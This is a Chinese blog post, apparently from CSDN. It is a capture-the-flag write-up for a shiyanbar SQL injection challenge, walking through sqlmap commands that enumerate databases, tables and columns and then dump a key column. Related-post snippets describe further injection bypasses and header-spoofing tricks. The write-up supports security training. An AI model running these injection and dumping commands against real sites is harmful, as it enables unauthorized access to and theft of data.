实验吧web

最新推荐文章于 2021-03-13 10:37:07 发布
最新推荐文章于 2021-03-13 10:37:07 发布
阅读量195 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mengtongxch/article/details/83177347
版权

题目:

很明显。过年过节不送礼,送礼就送这个

格式:

解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1

首先用sqlmap判断是否存在sql注入

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"

然后爆出其数据库名称

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1"  --dbs

爆出其表

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

爆出字段

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

得到flage

南絮朝颜
关注
实验吧——WEB-认真一点!
迷风小白
04-12 2740
认真一点! 打开链接,看到这个页面,第一反应又是sql注入 翻翻源码没有任何提示 打开burp开始抓包,包头与返回头又没有任何提示,试着开始修改ID 的值,观察页面变化。 提交1或用语句让框内为真,显示You are in。 提交语句有错误或语句让框内为假,不报错,但显示You are not in(实质和报错一样) 提交某些特殊字符会被过滤并显示sql injection dete...
决斗场 - 实验WEB 这个看起来有点简单!
RaAlGhul的博客
12-06 1288
题目链接:http://www.shiyanbar.com/ctf/33 今天小编在写这道题题解的时候才发现,原来实验吧有这道题的视频讲解。看了一下,视频讲的不是很清楚,而且用的还是sqlmap进行注入的,那么小编这里还是用手工注入的角度来讲解一下这道题如何去注入。 这道题其实蛮简单的,点开题目,我们能看到一个疑似sql查找结果的表: 看下URL,我们可以看到URL中传入id
实验吧writeup Web方向
08-27
就是实验吧的一些writeup,,因缺思厅的绕过,让我进去,上传绕过, dvwa,简单的sql注入3
实验Web
paintShadow的博客
08-02 345
打开链接后只有一句"have a fun!",并没有发现PHP代码,于是尝试从抓包,在响应中获取了有用的信息 发现存在一个名为6c525af4059b4fe7d8c33a.txt的文件,访问就会得到代码,审计代码得到: <?php $info = ""; $req = []; $flag="xxxxxxxxxx"; ini_set("display_error", false); er...
ctf-实验吧-web-Once More-wp
a3uRa的一个窝
04-14 377
  这个题是我第二遍做,第一遍是第一个账号做的,当时还是小白,真的什么也不会,当然现在水平还是很低。。。   第二遍又重创了个实验吧的账号,这次打算不去上网搜 wp,自己做做看,开是刷题。。。   ereg()函数漏洞,科学记数法, ~~~打开后,点击view the source code,直接可以看到源代码,毋庸置疑,代码审计 &lt;?php if (isset ($_GET['p...
web_stor.rar_web 报告_web实验_web实验报告_实验文档 web_网上书店
09-22
标题中的“web_stor.rar”是一个压缩文件,通常用于存储多个相关文件或文件夹,这里包含的是关于“web实验”的内容。"web 报告"指的是实验完成后编写的详细记录,它可能包括实验目的、过程、结果分析以及结论。"web...
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
【网络安全自学篇】WEB渗透与隐写术解密——实验吧CTF实战解析 在网络安全领域,WEB渗透是指通过寻找并利用网站应用的漏洞来获取未经授权的访问或控制权限。而隐写术则是指在图像、音频或其他媒体中隐藏信息的技术...
实验web服务器配置实验报告.pdf
最新发布
11-13
实验报告的主要目的是掌握 Windows 2003 Server 下 IIS 的安装和配置,以及 Web 服务的管理。实验中,我们学习了 IIS 的安装、配置和管理,并且掌握了 Web 服务器的配置和管理。 在实验中,我们首先安装了 IIS,...
实验吧-web-wp
Iambangbang的博客
08-21 627
登陆一下好吗? 这道题目是一道技巧性的题目,显然,问题的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道题是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
实验WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP。
实验吧——(web)简单的SQL注入1、2 writeup
qq_39480875的博客
05-22 552
判断注入类型 输入:1 输入:1’ 出现报错,初步猜测这是一个字符型的注入。 尝试一些基本的语句: 输入: 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤 测试了几个关键词以后,发现都被过滤了 关键词被过滤:解决方法如下 1大小写交替: Ord...
实验吧——Web-PHP大法
Ifish的博客
05-24 836
题目描述 结题思路 点开链接 根据提示,打开index.php.txt 首先,需要绕过eregi函数验证,输入的字符串必须不能有“hackerDJ”,大小写都不可以 其次会将传入的字符串进行url解密 最后如果字符串等于hackerDJ,则输出flag 所以理清思路以后,先将字符串url加密一次 尝试发现 想起来,浏览器会自动为我们decode一次,所以尝...
实验吧-web-加了料的报错注入(注释符/**/、post注入)
Sea_Sand息禅
03-17 471
页面提示,让post username和password,hackbar现在是越来越差劲了,直接用的bp。 报错注入来说,也有几个类型,不过这里我用的updatexml,经测试,extractvalue也是可以的。 首先,fuzz一下username和password: select、update这些都没有被过滤 而这些被过滤,系统识别是sql注入: 经测试,=是被SQL注...
实验web 拐弯抹角
xiaohajunsky的博客
04-23 2623
// code by SEC@USTC echo ''; $URL = $_SERVER['REQUEST_URI']; //echo 'URL: '.$URL.''; $flag = "CTF{???}"; $code = str_replace($flag, 'CTF{???}', file_get_contents('./index.php')); $stop = 0
实验WEB CTF 貌似有点难 全网最简单易懂的解题方法
hello world
03-13 461
前言 题目网址:http://www.shiyanbar.com/ctf/32 需要用到的工具: burpsuite 理解 函数分析 代码中包含了两个部分,一个是得到IP地址的GetIP函数,一个是通过GetIP函数获得的IP验证是否为1.1.1.1的主函数部分。 那么这题的思路应该非常的清晰,我们需要想方法使得代码中的GetIP函数获得的IP地址为1.1.1.1,我们就能得到flag。 好,那么现在我们再来查看这个函数,在这个函数中我们可以这样去进行理解,首先查看是否存在$_SERVE.
实验吧——WEB-登陆一下好吗??
迷风小白
04-03 2714
登陆一下好吗?? 拿到题目第一反应应该是sql注入,试一下万能密码('or 1=1 or '1) 发现or被过滤掉了,我们可以大胆猜测一下后台sql查询语句 $sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”; 接下来就是构造语句来绕过判断 userna...
实验WEB writeup(详细基础)
weixin_43960884的博客
07-20 4687
简单的登录题 不简单 后台登录 $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; 文件名ffifdyop就是题目的线索 做个测试 实际上原始二进制为 'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 但由于\之后的三个符号会组合成一...
实验吧CTF刷题记录(web篇四)
sinat_21923549的博客
03-14 1664
1.简单的sql注入之2 有回显的mysql注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_2.php 尝试输入单引号,出现错误 输入id=1' or ''='  出现SQLi detected! 接着尝试输入or,没有出现SQLi detected字样,输入空格,出现SQLi detected。 可以发现此
实验WEB题目解析:代码审计与PHP函数应用
在本次提供的实验WEB题目WP中,主要涉及到了几个关键的PHP编程知识点,包括代码审计、函数应用和安全漏洞利用。以下是详细的解读: 1. **代码审计与变量覆盖**: 题目中提到的一个代码审计挑战涉及到`extract`和`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值